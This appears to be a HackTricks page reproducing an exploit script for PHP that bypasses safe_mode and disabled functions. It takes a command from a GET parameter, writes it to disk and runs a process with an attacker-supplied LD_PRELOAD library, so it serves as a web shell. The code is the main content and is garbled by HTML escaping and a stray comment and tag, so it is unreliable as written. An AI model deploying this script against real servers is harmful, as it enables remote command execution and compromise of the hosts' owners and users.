tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

PHP safe_mode bypass via proc_open() and custom environment Exploit

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

php
<!--p $path="/var/www"; //change to your writable path $a=fopen($path."/.comm","w"); fputs($a,$_GET["c"]); fclose($a); $descriptorspec = array( 0--> array("pipe", "r"), 1 =&gt; array("file", $path."/output.txt","w"), 2 =&gt; array("file", $path."/errors.txt", "a" ) ); $cwd = '.'; $env = array('LD_PRELOAD' =&gt; $path."/a.so"); $process = proc_open('id &gt; /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed sleep(1); $a=fopen($path."/.comm1","r"); echo "<strong>"; while (!feof($a)) {$b=fgets($a);echo $b;} fclose($a); ?&gt;; </strong>

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks